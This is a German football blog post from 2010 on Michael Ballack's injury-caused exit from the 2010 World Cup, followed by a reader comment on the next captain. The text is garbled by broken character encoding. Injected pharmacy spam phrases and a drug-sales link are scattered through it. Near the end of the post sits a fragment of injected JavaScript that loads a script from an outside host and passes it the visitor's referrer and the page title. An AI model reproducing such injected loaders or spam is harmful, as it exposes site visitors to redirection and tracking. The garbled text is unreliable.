Willkommen auf » WM-Aus fA?r Michael Ballack
17. Mai 2010

WM-Aus fA?r Michael Ballack

Schock… Michael Ballack kann aufgrund einer Verletzung nicht an der FuAYball-WM 2010 teilnehmen.

Eine Untersuchung von DFB-Mannschaftsarzt Dr. MA?ller-Wohlfahrt bestA�tigte heute die BefA?rchtungen, dass sich Ballack beim FA-Cup Finale mit dem FC Chelsea am vergangenen Samstag doch ernsthaft verletzt hat. Innenbandriss sowie einen Teilabriss der Syndesmose im rechten Sprunggelenk lautet die konkrete Diagnose. In frA?hestens acht Wochen kann Ballack wieder trainieren. Hier ein aktueller Video-Bericht mit EinschA�tzungen von ZDF-Sportmoderator Michael Steinbrecher Purchase und ein purchase indinavir capsule ZDFspezial zum Thema. Reaktionen aus dem Trainingslager der Nationalelf und von Michael Ballack selbst.

Und hier die tragische Szene, das vA�llig sinnlose Foul von Gegenspieler Kevin-Prince Boateng vom FC Portsmouth, der im A?brigen mit Ghana als WM-Gruppengegner auf Deutschland trifft
[youtube:http://www.youtube.com/watch?v=D_m83fRSRgA]

Bundestrainer Joachim LA�w steht nun vor der schwierigen Entscheidung, wie er sein zentrales Mittelfeld aufbaut Buy . Uli HoeneAY meint, Purchase LA�w hat genug Alternativen http://www.links-medical.com/generic-for-ceftin/ Buy , ich seh es dann doch etwas anders.
Bastian Schweinsteiger ist gesetzt, ok, Sami Khedira steht bereit, Heiko Westermann hat auch schon recht ordentlich im defensiven Mittelfeld gespielt, dann wirds aber schon eng, die Klasse von Ballack ist in keinem Fall ersetzbar… die nicht nominierten Thorsten Frings (zu unrecht) und Thomas Hitzlsperger (zu recht) dA?rfen sich dennoch wohl keine Hoffnungen auf einen Anruf des Bundestrainers machen. Ich persA�nlich wA?rde nicht auf die Erfahrung von Frings verzichten, jetzt erst recht.

Es ist einfach Mist!
Deutschland verliert seinen KapitA�n aceon online shoes , seinen Antreiber in Top-Form, einzigen Star von internationalem Format, und Michael Ballack wird die Teilnahme an seinem vielleicht letzten groAYen internationalen Turnier genommen.
Danke Herr Boateng!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; viagra super active coupon code Cheap


Ein Kommentar



  1. Eine weitere interessante Frage: wer hat das Zeug zum neuen Kapitän der deutschen Nationalmannschaft?
    Gar nicht so einfach… geht es nach der Anzahl der Länderspiele, dann würde Miro Klose nachrücken (mit 94 Spielen), danach Schweinsteiger (73 Spiele), Podolski (71 Spiele), Friedrich (70), Lahm (64) und Mertesacker (60).
    ~~~
    Klose ist aber viel zu ruhig, Podolski und Mertesacker sind einfach keine Leader, Schweinsteiger halte ich für „noch nicht reif genug“, mit dem Ausfüllen der spielerischen Rolle Ballacks wird er genug zu tun haben. Lahm erhebt für sich ja des Öfteren den Führungsanspruch beim FC Bayern, seine Position als Außenverteidiger ist meiner Meinung nach für die Kapitänsrolle aber hinderlich, er hat einfach keinen Zugang zum Zentrum des Spiels.
    Ein Name fehlt noch…
    Ich würde Arne Friedrich als festen Innenverteidiger neben Per Mertesacker installieren und ihm die Kapitänsbinde übergeben. Er ist erfahren (spielte bereits drei große Turniere – EM 2004, WM 2006 und EM 2008), führte in Berlin jetzt mehrere Jahre ein Bundesligateam an und absolvierte bereits fünf Länderspiele als Kapitän.
    Warum also nicht? Ich traue ihm die Rolle auch bei dieser Weltmeisterschaft zu… aber mal sehen was das deutsche Trainerteam ausheckt :)

Einen Kommentar schreiben